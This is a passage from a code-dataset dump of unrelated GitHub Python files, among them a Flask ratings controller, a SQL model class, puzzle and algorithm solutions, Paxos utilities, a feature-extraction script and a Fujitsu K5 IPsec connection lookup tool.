    \"\"\"This method takes place after outputs are processed and\n        added to the display.\"\"\"\n        return\n","repo_name":"tankata/Python-Toolbox-Data-Management","sub_path":"Data_Management_Tools.pyt","file_name":"Data_Management_Tools.pyt","file_ext":"pyt","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"20988513736","text":"from flask_app import app\n\n\n\nfrom flask import render_template, session, redirect, request, flash\nfrom flask_app.models.rating import Rating\nfrom flask_app.models.show import Show\nimport json\nimport requests\nimport os\n\n\n\n\n# Route to process new show rating\n@app.route('/process/rating', methods=[\"POST\"])\ndef process_rating():\n    \n    api_input = { \"media_api_id\" : session['show_api_id'] }\n    media_in_db = Show.display_show(api_input)\n    \n    # differentiation between movie and show\n    show_type = 0\n    movie_type = 0\n    if session['show_type'] == \"TVSeries\":\n        show_type = 1\n    else:\n        movie_type = 1\n    \n    # finding average of user ratings\n    rating_total = (int(float(request.form['story'])) + int(float(request.form['characters'])) + int(float(request.form['visual_appeal'])) + int(float(request.form['enjoyment'])) + int(float(request.form['music'])) + int(float(request.form['setting']))) / 6\n    \n    \n    # if show / movie is already in db, processing the rating\n    if len(media_in_db) != 0:\n        media = media_in_db[0]\n        data2 ={\n            'rating_total' : rating_total,\n            'tier' : request.form['tier'],\n            'story' : request.form['story'],\n            'characters' : 
request.form['characters'],\n 'visual_appeal' : request.form['visual_appeal'],\n 'enjoyment' : request.form['enjoyment'],\n 'music' : request.form['music'],\n 'setting' : request.form['setting'],\n 'user_id' : session['user_id'],\n 'media_id' : media.id,\n }\n \n rating = Rating.add_rating(data2)\n \n return redirect(f'/process/choice/{session[\"show_api_id\"]}')\n \n \n # if show isn't in the db, adding it, and then processing the rating\n data = {\n 'media_api_id' : session['show_api_id'],\n 'media_title' : session['show_title'],\n 'media_image' : session['show_image'],\n 'is_movie' : movie_type,\n 'is_show' : show_type\n }\n \n media_id = Show.add_media(data)\n \n data2 ={\n 'rating_total' : rating_total,\n 'tier' : request.form['tier'],\n 'story' : request.form['story'],\n 'characters' : request.form['characters'],\n 'visual_appeal' : request.form['visual_appeal'],\n 'enjoyment' : request.form['enjoyment'],\n 'music' : request.form['music'],\n 'setting' : request.form['setting'],\n 'user_id' : session['user_id'],\n 'media_id' : media_id,\n }\n \n rating = Rating.add_rating(data2)\n \n return redirect(f'/process/choice/{session[\"show_api_id\"]}')\n\n\n# route to process rating update\n@app.route('/process/rating/update', methods=[\"POST\"])\ndef update_rating():\n \n # finding average of user ratings\n rating_total = (int(float(request.form['story'])) + int(float(request.form['characters'])) + int(float(request.form['visual_appeal'])) + int(float(request.form['enjoyment'])) + int(float(request.form['music'])) + int(float(request.form['setting']))) / 6\n \n data = {\n 'id': session['rating_id'],\n 'rating_total' : rating_total,\n 'tier' : request.form['tier'],\n 'story' : request.form['story'],\n 'characters' : request.form['characters'],\n 'visual_appeal' : request.form['visual_appeal'],\n 'enjoyment' : request.form['enjoyment'],\n 'music' : request.form['music'],\n 'setting' : request.form['setting'],\n }\n \n Rating.update_rating(data)\n \n return redirect(f'/process/choice/{session[\"show_api_id\"]}')","repo_name":"davidpierce24/iMPReSSioN-python-flask-full-stack","sub_path":"flask_app/controllers/ratings.py","file_name":"ratings.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33155593553","text":"from app import app\nfrom app.models.base_models import BaseModel\nfrom app.models.joke_model import JokeModel\nfrom app.models.user_model import UserModel\nfrom app.models.connector import MySQLConnection \n\nclass TopicModel(BaseModel):\n\n table=\"topics\"\n json_fields = ['id', 'title', 'players', 'setting', 'plot', 'conflict', 'theme', 'narrative_arc', 'jokes', 'users_id']\n\n basic_select = \"\"\"\n topics.id AS id,\n title,\n users_id,\n players,\n setting,\n plot,\n conflict,\n theme,\n narrative_arc,\n\n users.id AS users_id,\n users.email AS users_email\n \"\"\"\n\n basic_joins = \"\"\"\n\n LEFT JOIN users ON users.id = topics.users_id\n \"\"\"\n\n def __init__(self, data):\n\n self.id = data['id']\n self.title = data['title']\n self.players = data['players']\n self.setting = data['setting']\n self.plot = data['plot']\n self.conflict = data['conflict']\n self.theme = data['theme']\n self.narrative_arc = data['narrative_arc']\n\n self.user = UserModel({\n 'id': data['users_id'],\n 'email': data['users_email']\n })\n\n self._jokes = None\n\n @property # lazy loading - only loads the jokes data if needed;\n def jokes(self):\n \n if self._jokes is None:\n self._jokes = 
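The ratings controller above repeats the six-field int(float(request.form[...])) average three times. A hedged refactor sketch — not the app's actual code, just one way to centralize it while keeping the same string-to-int casting behavior:

RATING_FIELDS = ("story", "characters", "visual_appeal", "enjoyment", "music", "setting")

def average_rating(form):
    # Form values arrive as strings like "3" or "3.5"; int(float(...)) matches the original casts
    scores = [int(float(form[field])) for field in RATING_FIELDS]
    return sum(scores) / len(scores)

Then each route could call average_rating(request.form) instead of rebuilding the expression inline.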
JokeModel.filter_all_by({'topics_id': self.id}, jsonify=True)\n \n return self._jokes\n\n @classmethod\n def add(cls, user, new_topic):\n\n query = \"\"\"\n INSERT INTO topics\n ( \n title,\n players,\n setting,\n plot,\n conflict,\n theme,\n narrative_arc,\n users_id\n )\n VALUES\n (\n %(title)s,\n %(players)s,\n %(setting)s,\n %(plot)s,\n %(conflict)s,\n %(theme)s,\n %(narrative_arc)s,\n {users_id}\n )\n \"\"\".format(users_id=user.id)\n \n new_topic_id = MySQLConnection(cls.db).query_db(query, {\n 'title': new_topic['title'],\n 'players': '' if 'players' not in new_topic else new_topic['players'],\n 'setting': '' if 'setting' not in new_topic else new_topic['setting'],\n 'plot': '' if 'plot' not in new_topic else new_topic['plot'],\n 'conflict': '' if 'conflict' not in new_topic else new_topic['conflict'],\n 'theme': '' if 'theme' not in new_topic else new_topic['theme'],\n 'narrative_arc': '' if 'narrative_arc' not in new_topic else new_topic['narrative_arc']\n })\n \n return None if not new_topic_id else cls.get_by_id(new_topic_id)\n\n @classmethod\n def update(cls, topic, update_data):\n\n query = \"\"\"\n UPDATE topics \n SET \n title = %(title)s,\n players = %(players)s, \n setting = %(setting)s, \n plot = %(plot)s, \n conflict = %(conflict)s, \n theme = %(theme)s, \n narrative_arc = %(narrative_arc)s,\n updated_at = NOW()\n WHERE \n id = {topic_id}\n \"\"\".format(topic_id=topic.id)\n\n topic_id = MySQLConnection(cls.db).query_db(query, {\n 'title': topic.title,\n 'players': topic.players if 'players' not in update_data else update_data['players'],\n 'setting': topic.setting if 'setting' not in update_data else update_data['setting'],\n 'plot': topic.plot if 'plot' not in update_data else update_data['plot'],\n 'conflict': topic.conflict if 'conflict' not in update_data else update_data['conflict'],\n 'theme': topic.theme if 'theme' not in update_data else update_data['theme'],\n 'narrative_arc': topic.narrative_arc if 'narrative_arc' not in update_data else update_data['narrative_arc']\n })\n\n return cls.get_by_id(topic.id) if topic_id else None\n\n @classmethod\n def is_valid(cls, topic):\n\n return 'title' in topic and topic['title'] != ''\n\n \"\"\"\n return ('players' in topic and topic['players']!= '') or \\\n ('setting' in topic and topic['setting'] != '') or \\\n ('plot' in topic and topic['plot'] != '') or \\\n ('conflict' in topic and topic['conflict'] != '') or \\\n ('theme' in topic and topic['theme'] != '') or \\\n ('narrative_arc' in topic and topic['narrative_arc'] != '')\n \"\"\"","repo_name":"instructorlee/react_integration_flask_app","sub_path":"app/models/topic_model.py","file_name":"topic_model.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28475676732","text":"import os.path as osp\n\nimport pytest\n\nfrom gomoku.board import Board\nfrom gomoku.game_handler import GameHandler\nfrom gomoku.mcts import MCTSAgent\nfrom gomoku.player import Player\nfrom gomoku.script import Script\n\n\ndef get_gh_from_script(filename):\n gh = GameHandler(Board(), [Player(1), Player(2)])\n base_dir, suffix = 'scripts', '.txt'\n path = osp.join(base_dir, filename + suffix)\n script = Script(path)\n while script.running():\n gh.do_move(script.get_move())\n return gh\n\n\nBLACK = 1\nMCTS_BASIC = {\n 'four': [(7, 13), (12, 8)],\n}\nMCTS_OPPONENT = {\n 'four_opponent': [(7, 13)],\n}\n\nFILES = list(MCTS_BASIC.keys()) + list(MCTS_OPPONENT.keys())\nNODES = {path: 
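The jokes property above hand-rolls lazy loading with a _jokes sentinel. On Python 3.8+ the same memoize-on-first-access pattern can be expressed with functools.cached_property; a minimal sketch assuming the same JokeModel query API (the class name here is illustrative, not from the repo):

from functools import cached_property

class TopicSketch:
    def __init__(self, topic_id):
        self.id = topic_id

    @cached_property
    def jokes(self):
        # Runs once on first access; the result is then cached on the instance
        return JokeModel.filter_all_by({'topics_id': self.id}, jsonify=True)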
get_gh_from_script(path) for path in FILES}\n\n\n@pytest.mark.parametrize(\"problem\", MCTS_BASIC.items())\ndef test_basic(problem):\n board_name, best_moves = problem\n game_handler = NODES[board_name]\n black_mcts_agent = MCTSAgent(BLACK, depth=1)\n best_move = black_mcts_agent.find_move(game_handler)\n assert best_move in best_moves\n\n\n@pytest.mark.parametrize('execution_number', range(1))\n@pytest.mark.parametrize(\"problem\", MCTS_OPPONENT.items())\ndef test_opponent(problem, execution_number):\n board_name, best_moves = problem\n game_handler = NODES[board_name]\n black_mcts_agent = MCTSAgent(BLACK, depth=5, time_limit=20)\n best_move = black_mcts_agent.find_move(game_handler)\n assert best_move in best_moves\n","repo_name":"mtrazzi/gomoku","sub_path":"tests/test_mcts.py","file_name":"test_mcts.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"9615675246","text":"from contextlib import contextmanager\nfrom functools import wraps\nimport logging\nfrom sqlalchemy.orm import sessionmaker\nfrom config import engine\n\nLOGGER = logging.getLogger(__file__)\n\n@contextmanager\ndef create_session():\n \"\"\"\n Simple context manager that will create and destroy a session\n \"\"\"\n Session = sessionmaker(bind=engine)\n session = Session()\n try:\n yield session\n session.commit()\n except Exception:\n session.rollback()\n raise\n finally:\n session.close()\n\n\ndef provide_session(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n session_arg_name = \"session\"\n func_params = func.__code__.co_varnames\n if session_arg_name not in func_params:\n logging.warn(\"No `session` parameter exists for this function. Doing nothing.\")\n return func(*args, **kwargs)\n in_args = session_arg_name in func_params and func_params.index(session_arg_name) < len(args)\n in_kwargs = session_arg_name in kwargs\n if in_args or in_kwargs:\n return func(*args, **kwargs)\n else:\n with create_session() as session:\n return func(*args, session=session, **kwargs)\n return wrapper","repo_name":"c-simpson/paws-data-pipeline","sub_path":"src/server/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"29744458355","text":"import numpy as np\nimport pandas as pd\nimport math\n\n\ndef scanData(input):\n f = open(input)\n\n tileNames = list()\n\n def filter(string):\n ret = []\n for i in string:\n if i.isnumeric():\n ret.append(i)\n\n return \"\".join(ret)\n\n def token(string):\n ret = []\n for i in string:\n if i != '\\n':\n ret.append(i)\n\n return ret\n\n df = pd.DataFrame()\n\n for i in f:\n if 'Tile' in i:\n tileNames.append(filter(i))\n pass\n elif i != '\\n':\n df = df.append(token(i))\n\n data = np.array(df[0])\n numTiles = len(tileNames)\n data = (data.reshape(numTiles, 10, 10))\n\n ret = {}\n index = 0\n for i in tileNames:\n ret.update({i: pd.DataFrame(data[index])})\n index = index + 1\n\n return ret\n\ndef getBound(df):\n top = df.iloc[0].tolist()\n bottom = df.iloc[9].tolist()\n left = df[0].tolist()\n right = df[9].tolist()\n topF = top.copy()\n topF.reverse()\n bottomF = bottom.copy()\n bottomF.reverse()\n leftF = left.copy()\n leftF.reverse()\n rightF = right.copy()\n rightF.reverse()\n\n return top,bottom,left,right,topF,bottomF,leftF,rightF\n\ndef Match(t,b,l,r,top,bottom,left,right):\n if t==bottom:\n return \"Above\"\n elif b==top:\n return \"Bottom\"\n elif l==right 
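The provide_session decorator in helpers.py above injects a session only when the caller did not supply one. A usage sketch under that contract — User here is a hypothetical mapped model, not part of the file:

from helpers import create_session, provide_session

@provide_session
def count_users(session=None):
    # `session` is injected by the decorator when the caller omits it
    return session.query(User).count()

count_users()                 # decorator opens, commits, and closes a session
with create_session() as s:
    count_users(session=s)    # an explicit session is passed through untouched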
:\n return \"Left\"\n elif r ==left:\n return \"Right\"\n else:\n return \"\"\n\ndef unFlip(df):\n ret = (df.iloc[::-1])\n return pd.DataFrame(ret.to_numpy())\n\ndef rotate(df):\n return pd.DataFrame(unFlip(df.T).to_numpy())\n\ndef findBorder(d,key):\n copy = d.copy()\n copy.pop(key)\n ret = {}\n t, b, l, r, tf,bf,lf,rf = getBound(d[key])\n for i in copy.keys():\n top, bottom, left, right, topF, bottomF, leftF, rightF = getBound(copy[i])\n norm = [top,bottom,left,right]\n flip = [topF, bottomF, leftF, rightF]\n combined = norm+flip\n if(t in combined )|( b in combined )| (l in combined )|( r in combined):\n tryFlip = True\n #isFlipped = (t in flip )|( b in flip )|( l in flip )|( r in flip) | (t==top) | (r == right) | (l == left) | (b==bottom)\n # if (t in flip ) & (b in flip) & (l in flip) & (r in flip):\n # isFlipped = False\n for loop in range(4):\n if (Match(t, b, l, r, top, bottom, left, right) == \"\"):\n copy.update({i: rotate(copy[i])})\n top, bottom, left, right, topF, bottomF, leftF, rightF = getBound(copy[i])\n else:\n tryFlip=False\n break\n if(tryFlip):\n copy.update({i:unFlip(copy[i])})\n top, bottom, left, right, topF, bottomF, leftF, rightF = getBound(copy[i])\n for n in range(4):\n if(Match(t,b,l,r,top,bottom,left,right)==\"\"):\n copy.update({i: rotate(copy[i])})\n top, bottom, left, right, topF, bottomF, leftF, rightF = getBound(copy[i])\n else:\n break\n\n ret.update({i:Match(t,b,l,r,top,bottom,left,right)})\n return ret,copy\n pass\n\ndef setupDict(input):\n ret = {}\n for i in input.keys():\n ret.update({i:False})\n return ret\n\ndef recursiveTrace( tileKey, input, initial):\n if(recursiveDict[tileKey]==True):\n return\n if(initial==True):\n tupleDict.update({tileKey:(0,0)})\n relation,update = findBorder(input,tileKey)\n relationDict.update({tileKey:relation})\n recursiveDict.update({tileKey:True})\n input.update(update)\n NearbyTiles = []\n for i in relation.keys():\n if relation[i] != '':\n NearbyTiles.append(i)\n for j in NearbyTiles:\n if (j in tupleDict.keys()) == False:\n if relation[j] == 'Left':\n tupleDict.update({j:(tupleDict[tileKey][0]-1,tupleDict[tileKey][1])})\n if relation[j] == 'Right':\n tupleDict.update({j: (tupleDict[tileKey][0] + 1, tupleDict[tileKey][1])})\n if relation[j] == 'Above':\n tupleDict.update({j: (tupleDict[tileKey][0], tupleDict[tileKey][1]+1)})\n if relation[j] == 'Bottom':\n tupleDict.update({j: (tupleDict[tileKey][0], tupleDict[tileKey][1]-1)})\n\n recursiveTrace(tileKey=j,input = input, initial = False)\n\n return input\n\ndef findOrder():\n smallestX = 0\n largestY = 0\n for i in tupleDict.keys():\n if (tupleDict[i][0] < smallestX):\n smallestX = tupleDict[i][0]\n if (tupleDict[i][1] > largestY):\n largestY = tupleDict[i][1]\n\n\n list = []\n\n outerIndex = 0\n for i in range(length):\n innerIndex = 0\n for j in range(length):\n for k in tupleDict.keys():\n if (tupleDict[k] == (smallestX + innerIndex, largestY - outerIndex)):\n list.append(k)\n innerIndex = innerIndex + 1\n outerIndex = outerIndex + 1\n numpy = np.array(list)\n numpy = numpy.reshape(length, length)\n return numpy\n\n\ndata = scanData('sample.txt')\n\ninput = data.copy()\nrecursiveDict = setupDict(input)\nrelationDict = {}\ntupleDict = {}\n\nfinalImage = recursiveTrace(tileKey=str(list(data.keys())[0]),input=data, initial=True)\nlength = int(math.sqrt(len(data)))\nfinalOrder = findOrder()\nfourCorners = [finalOrder[0,0],finalOrder[0,length-1],finalOrder[length-1,0],finalOrder[length-1,length-1]]\n\n\ndf = pd.DataFrame()\nfor i in finalOrder:\n listOfDf = []\n for j 
in i:\n listOfDf.append(finalImage[j])\n temp = pd.concat(listOfDf,axis = 1)\n df = pd.concat([df,temp],axis = 0)\n\ndf.columns = [i for i in range(length*10)]\ndf.index = [i for i in range(length*10)]\nprint(df)\nnpArray = df.to_numpy().flatten()\nindex = 0\nnumSM = 0\nfor i in npArray:\n if(index+2*(length*10) < len(npArray)):\n if(npArray[index]=='#'):\n if(npArray[index+(length*10)-18]=='#'):\n if(npArray[index+(length*10)-13]=='#'):\n if (npArray[index+(length*10)-12] == '#'):\n if (npArray[index+(length*10)-7] == '#'):\n if (npArray[index + (length * 10) - 6] == '#'):\n if (npArray[index + (length * 10) - 1] == '#'):\n if (npArray[index + (length * 10)] == '#'):\n if (npArray[index + (length * 10) +1] == '#'):\n if (npArray[index + 2*(length * 10) - 2] == '#'):\n if (npArray[index + 2*(length * 10) - 5] == '#'):\n if (npArray[index + 2*(length * 10) - 8] == '#'):\n if (npArray[index + 2*(length * 10) - 11] == '#'):\n if (npArray[index + 2*(length * 10) - 14] == '#'):\n if (npArray[index + 2*(length * 10) - 17] == '#'):\n numSM = numSM+1\n\n index = index +1\n\nprint(numSM)\n\n\n#print(f'Four Corners are {fourCorners}')\n#print(f'Final Ouput is {int(fourCorners[0])*int(fourCorners[1])*int(fourCorners[2])*int(fourCorners[3])}')\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Goubugi/Advent","sub_path":"2020/Day_20/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38957014254","text":"# 정수 삼각형\r\nimport sys\r\n\r\nn = int(sys.stdin.readline())\r\nvals = []\r\n\r\nfor i in range(n):\r\n\tval = list(map(int, sys.stdin.readline().split()))\r\n\tvals.append(val)\r\n\r\nfor i in range(1, n):\r\n\tfor j in range(i + 1):\r\n\t\tif (j == 0):\r\n\t\t\tvals[i][j] += vals[i - 1][j]\r\n\t\telif (j == i):\r\n\t\t\tvals[i][j] += vals[i - 1][j - 1]\r\n\t\telse:\r\n\t\t\tvals[i][j] += max(vals[i - 1][j - 1], vals[i - 1][j])\r\n\r\nprint(max(vals[n - 1]))","repo_name":"Min-h-96/PS","sub_path":"Python/14단계-동적계획법1/1932.py","file_name":"1932.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7003276284","text":"#!/usr/bin/env python\n\nimport operator\n\n\nclass Solution(object):\n OPS = {'+': operator.add, '-': operator.sub, '*': operator.mul}\n\n def _parse(self, input):\n \"\"\"\n Parses the string expression into a list of integers and function\n operators.\n \"\"\"\n tokens = []\n start = 0\n\n for i in range(1, len(input)):\n c = input[i]\n if c in Solution.OPS:\n tokens.append(int(input[start:i]))\n tokens.append(Solution.OPS[c])\n start = i + 1\n\n tail = int(input[start:])\n tokens.append(tail)\n\n return tokens\n\n def _diffWaysToCompute(self, tokens, i, j, cache):\n \"\"\"\n Returns all possible computation results from all possible ways of\n arranging parenthesis around tokens[i:j + 1]. tokens[i] and tokens[j]\n must be numeric constants while all in-between tokens must alternate\n between numeric constants and function operators.\n\n Splits tokens[i:j + 1] around each operators in the range, computes\n ways for each left and right side, and combines according to the\n operator that the tokens were split around. Uses DP to avoid\n recomputing overlapping sub-problems.\n \"\"\"\n # The DP indeces for each [i...j] range. 
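The BOJ 1932 solution above accumulates the triangle row by row with vals[i][j] += max(vals[i-1][j-1], vals[i-1][j]), falling back to the single available parent on the edge columns. A tiny worked example with numbers of my own choosing:

triangle = [[7], [3, 8], [8, 1, 0]]
for i in range(1, len(triangle)):
    for j in range(i + 1):
        best_parent = max(
            triangle[i - 1][j - 1] if j > 0 else 0,
            triangle[i - 1][j] if j < i else 0,
        )
        triangle[i][j] += best_parent
print(max(triangle[-1]))  # rows become [10, 15] then [18, 16, 15]; prints 18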
For a token array with N\n # numeric constants, there are 2 * N - 1 total tokens because there is\n # an operator between each numeric constant.\n dpi = int(i / 2)\n dpj = int(j / 2)\n\n if i == j:\n # Single number without any surrounding operators.\n return [tokens[i]]\n elif cache[dpi][dpj] is not None:\n # Reuse previously computed result.\n return cache[dpi][dpj]\n\n ways = []\n\n # Step through tokens and split around each operator.\n for k in range(i + 1, j, 2):\n lhs = self._diffWaysToCompute(tokens, i, k - 1, cache)\n rhs = self._diffWaysToCompute(tokens, k + 1, j, cache)\n op = tokens[k]\n\n # Combine each possible result from the left split with each\n # possible result from the right split.\n for l in lhs:\n for r in rhs:\n ways.append(op(l, r))\n\n cache[dpi][dpj] = ways\n return ways\n\n def diffWaysToCompute(self, input):\n \"\"\"\n Returns all possible computation results from all possible ways of\n arranging parenthesis in the given input. The input must be a sequence\n of integers separated by the operators +, -, or * and nothing else.\n \"\"\"\n if len(input) == 0:\n return []\n tokens = self._parse(input)\n\n # Out of N tokens (N + 1) / 2 are numeric constants. Create a 2D matrix\n # that will serve as a DP cache for each [i...j] range of constants.\n n = int((len(tokens) + 1) / 2)\n cache = [[None for i in range(0, n)] for j in range(0, n)]\n\n return self._diffWaysToCompute(tokens, 0, len(tokens) - 1, cache)\n\n\ndef main():\n sol = Solution()\n actual = set(sol.diffWaysToCompute('2*3-4*5'))\n expected = set([-34, -14, -10, -10, 10])\n try:\n assert actual == expected\n except AssertionError:\n print('Expected %s but got %s.' % (expected, actual))\n raise\n\n print('Tests pass!')\n print('Please run this solution on LeetCode.')\n print('https://leetcode.com/problems/different-ways-to-add-parentheses/')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"andreimaximov/algorithms","sub_path":"leetcode/algorithms/different-ways-to-add-parenthesis/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3507,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"48"} +{"seq_id":"31211422812","text":"# ----------------------------------------------------------------------------------------------------\n#\n# UTILS FUNCTIONS\n#\n# ----------------------------------------------------------------------------------------------------\n\nPRINTING = False\n\n\ndef greedy_leader_election(network):\n\n \"\"\" Procedure to elect the leader of Paxos instances.\n\n :param network: dict\n The network of processes divided by roles.\n :return: int\n The process id (p_id) of the leader.\n \"\"\"\n\n p_id = network['proposers'][-1]\n return p_id\n\n\ndef import_config(config_file):\n\n \"\"\" Import and parse the config file in order to convert it to a list.\n\n :param config_file: str\n The name of the config file.\n :return: list\n The list containing info about processes in the config file.\n \"\"\"\n\n config = []\n with open(config_file, 'r') as f:\n for line in f.readlines():\n if line != '':\n role, ip, port = line.strip('\\n').split(' ')\n config.append([role, ip, port])\n return config\n\n\ndef create_network(config):\n\n \"\"\" Convert config list to a network dictionary where the processes are divided by roles.\n\n :param config: list\n The list create using the config file.\n :return: dict\n The dictionary containing a network of processes divided by roles.\n \"\"\"\n\n network = {'clients': [], 'proposers': [], 
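A quick sanity check of the Solution class above — the input string is my own example in the same format the file supports (integers separated by +, -, *):

sol = Solution()
# '2-1-1' parenthesizes as ((2-1)-1) = 0 or (2-(1-1)) = 2
print(sorted(sol.diffWaysToCompute('2-1-1')))  # [0, 2]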
'acceptors': [], 'learners': []}\n k = 0\n for agent in config:\n role, ip, port = agent[0], agent[1], int(agent[2])\n network[role] = {'ip': ip, 'port': port}\n k += 1\n return network\n\n\ndef print_stuff(msg):\n\n \"\"\" It just allow to easily insert or eliminate the prints \"\"\"\n\n if PRINTING:\n print(msg)\n\n","repo_name":"HeapHop30/atomic-broadcast-paxos","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"42092569643","text":"import yaml\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport os\n\nfrom utils.opencvhelper import MatcherWrapper\n\nfrom models import get_model\n\nFLAGS = tf.app.flags.FLAGS\n\ntf.app.flags.DEFINE_string('config', None, \"\"\"Path to the configuration file.\"\"\")\n\n\ndef draw_keypoints(img, kp):\n\n cv_kpts = [cv2.KeyPoint(kp[i][0], kp[i][1], 1) for i in range(kp.shape[0])]\n\n out_img = img\n\n cv2.drawKeypoints(out_img, cv_kpts, out_img)\n\n cv2.imwrite('tmp.png', out_img)\n\n\ndef main(argv=None): # pylint: disable=unused-argument\n \"\"\"Program entrance.\"\"\"\n # parse input\n with open(FLAGS.config, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n\n model = get_model('feat_model')(config['model_path'], **config['net'])\n\n img_folder = config['img_folder']\n out_folder = config['out_folder']\n\n for frame in os.listdir(img_folder):\n frameid = frame.rstrip('.png')\n print(frameid)\n img_path = os.path.join(img_folder, frame)\n img = cv2.imread(img_path)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)[..., np.newaxis]\n desc, kpt, score = model.run_test_data(gray)\n print(desc.shape)\n print(kpt.shape)\n print(score.shape)\n out_path = os.path.join(out_folder, frameid + '.npz')\n np.savez_compressed(out_path, keypoints=kpt, scores=score, local_descriptors=desc)\n\n draw_keypoints(img, kpt)\n # break\n\n\nif __name__ == '__main__':\n tf.compat.v1.app.run()\n","repo_name":"smy-THU/superglue-jittor","sub_path":"third_party/aslfeat/gen_keypoints.py","file_name":"gen_keypoints.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"39607144214","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nGET /v2.0/vpn/ipsec-site-connections/{connection-id}\nShow IPSec site connection details\n指定したIPsecサイト間の接続の詳細を表示する\n\"\"\"\n\n\"\"\"\n実行例\n\nbash-4.4$ ./bin/k5-list-site-connections.py | ./bin/k5-show-site-connection.py -\nconnection_id: d2a3ddf3-3b0c-4914-8851-17cd0eece29e\nGET /v2.0/vpn/ipsec-site-connections/{connection-id}\n================= ====================================\nname iida-az1-connection-01\nid d2a3ddf3-3b0c-4914-8851-17cd0eece29e\npeer_address 2.2.2.2\npeer_id 2.2.2.2\npsk passpass\nvpnservice_id 75f35f53-ecbd-4748-a070-3316435e35cc\nikepolicy_id 9fc16042-95ae-46b9-84bc-4777b3b9f89c\nipsecpolicy_id 26525271-0337-4ad2-b0d3-120814fc0794\nroute_mode static\nmtu 1500\ninitiator bi-directional\nauth_mode psk\nstatus DOWN\ntenant_id a5001a8b9c4a4712985c11377bd6d4fe\navailability_zone jp-east-1a\ndescription\n================= ====================================\n\"\"\"\n\nimport json\nimport logging\nimport os\nimport sys\n\ndef here(path=''):\n \"\"\"相対パスを絶対パスに変換して返却します\"\"\"\n if getattr(sys, 'frozen', False):\n # cx_Freezeで固めた場合は実行ファイルからの相対パス\n return os.path.abspath(os.path.join(os.path.dirname(sys.executable), path))\n 
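One thing worth flagging in the Paxos utils above: the docstring of create_network promises a dict of role lists, and greedy_leader_election indexes network['proposers'][-1] as a list, yet the loop body does network[role] = {...}, overwriting each list with a single dict. A sketch of the append-based version the docstring describes — this assumes the config rows carry the plural role names used as keys, which the source does not state explicitly:

def create_network_fixed(config):
    network = {'clients': [], 'proposers': [], 'acceptors': [], 'learners': []}
    for role, ip, port in config:
        # Append to the role's list instead of replacing it
        network[role].append({'ip': ip, 'port': int(port)})
    return network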
else:\n        # Otherwise use the path relative to this file's location\n        return os.path.abspath(os.path.join(os.path.dirname(__file__), path))\n\n# Make the python scripts placed in the lib folder importable\nif not here(\"../lib\") in sys.path:\n    sys.path.append(here(\"../lib\"))\n\nif not here(\"../lib/site-packages\") in sys.path:\n    sys.path.append(here(\"../lib/site-packages\"))\n\ntry:\n    from k5c import k5c\nexcept ImportError as e:\n    logging.exception(\"Failed to import the k5c module: %s\", e)\n    sys.exit(1)\n\ntry:\n    from tabulate import tabulate\nexcept ImportError as e:\n    logging.exception(\"Failed to import the tabulate module: %s\", e)\n    sys.exit(1)\n\n#\n# Access the API\n#\ndef access_api(connection_id=\"\"):\n    \"\"\"Accesses the REST API\"\"\"\n\n    # Endpoint to connect to\n    url = k5c.EP_NETWORK + \"/v2.0/vpn/ipsec-site-connections/\" + connection_id\n\n    # Instantiate the Client class\n    c = k5c.Client()\n\n    # Fetch with the GET method and obtain the result object\n    r = c.get(url=url)\n\n    return r\n\n\n#\n# Display the result\n#\ndef print_result(result):\n    \"\"\"Displays the result\"\"\"\n\n    # The status code is stored under the 'status_code' key\n    status_code = result.get('status_code', -1)\n\n    # Abnormal status code\n    if status_code < 0 or status_code >= 400:\n        print(json.dumps(result, indent=2))\n        return\n\n    # The payload is stored under the 'data' key\n    data = result.get('data', None)\n    if not data:\n        logging.error(\"no data found\")\n        return\n\n    #{\n    #  \"data\": {\n    #    \"ipsec_site_connection\": {\n    #      \"dpd\": {\n    #        \"action\": \"restart\",\n    #        \"timeout\": 30,\n    #        \"interval\": 10\n    #      },\n    #      \"tenant_id\": \"a5001a8b9c4a4712985c11377bd6d4fe\",\n    #      \"admin_state_up\": true,\n    #      \"description\": \"\",\n    #      \"initiator\": \"bi-directional\",\n    #      \"ipsecpolicy_id\": \"26525271-0337-4ad2-b0d3-120814fc0794\",\n    #      \"name\": \"iida-az1-connection-01\",\n    #      \"route_mode\": \"static\",\n    #      \"peer_cidrs\": [\n    #        \"10.2.1.0/24\"\n    #      ],\n    #      \"psk\": \"passpass\",\n    #      \"auth_mode\": \"psk\",\n    #      \"status\": \"DOWN\",\n    #      \"mtu\": 1500,\n    #      \"peer_address\": \"2.2.2.2\",\n    #      \"peer_id\": \"2.2.2.2\",\n    #      \"id\": \"d2a3ddf3-3b0c-4914-8851-17cd0eece29e\",\n    #      \"ikepolicy_id\": 